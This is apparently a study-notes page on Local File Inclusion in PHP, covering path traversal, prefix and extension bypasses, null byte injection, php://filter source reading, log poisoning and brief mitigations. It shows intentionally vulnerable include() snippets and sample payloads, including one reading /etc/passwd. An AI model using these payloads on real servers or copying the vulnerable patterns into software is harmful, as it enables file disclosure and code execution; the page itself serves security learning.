1.Local-file-inclusion-lfi

Key Takeaways: Local File Inclusion (LFI) Attacks

Basic LFI

  • Exploits a parameter that directly includes a file.

  • Example:

    ### Directly includes a file based on user input
include($_GET['language']);

    • Allows reading local files by manipulating the parameter.

Path Traversal

  • Bypasses directory restrictions using relative paths (../).

  • Example:

    ### Uses relative path traversal to escape intended directory
include("./languages/" . $_GET['language']);

    • Enables escaping the intended directory to access other files.

Filename Prefix Handling

  • Some applications prepend a prefix to included filenames.

  • Example:

    ### Bypassing filename prefix by treating it as a directory
include("lang_" . $_GET['language']);

    • Can be bypassed by using / to treat the prefix as a directory.

Appended Extensions Bypass

  • Some implementations append extensions like .php.

  • Example:

    ### Bypassing appended extensions
include($_GET['language'] . ".php");

    • Common bypasses include null byte injections and PHP wrappers (discussed below).

Second-Order LFI

  • Occurs when LFI is exploited through indirect user input (e.g., database entries).

  • Example:

    ### Injecting LFI payload via user-controlled database input
$username = getUsernameFromDB($_GET['id']);
include($username);

    • Highlights the importance of sanitizing all user-controlled data.

Platform Agnostic Nature

  • LFI techniques apply across various backend languages and frameworks.

Additional Considerations

Null Byte Injection (Older PHP)

  • In older PHP versions, appending a null byte (%00) could truncate the filename and bypass appended extensions.

  • Example:

    ### Exploiting null byte injection to bypass extension appending
include("/etc/passwd%00");

    • This is less effective in modern PHP versions.

PHP Wrappers and Filters

  • PHP wrappers like php://filter allow encoding/decoding files, enabling attackers to read source code even if it’s executed.

  • Example:

    ### Using PHP wrappers to read source code
include("php://filter/convert.base64-encode/resource=index.php");

Log File Poisoning

  • Attackers can inject data into log files and later include those logs using LFI to execute arbitrary code.

  • Often used for achieving Remote Code Execution (RCE).

Error Handling

  • Detailed error messages should be disabled in production environments.

  • Attackers can leverage errors to map the server's file structure.

Input Sanitization

  • Proper validation and sanitization of user input prevent LFI vulnerabilities.

  • Whitelisting allowed characters and file paths is a best practice.

Security Headers

  • While not a direct mitigation, security headers add an additional layer of defense against exploitation.

Previous1.File DisclosureNext2.Basic-bypasses

Last updated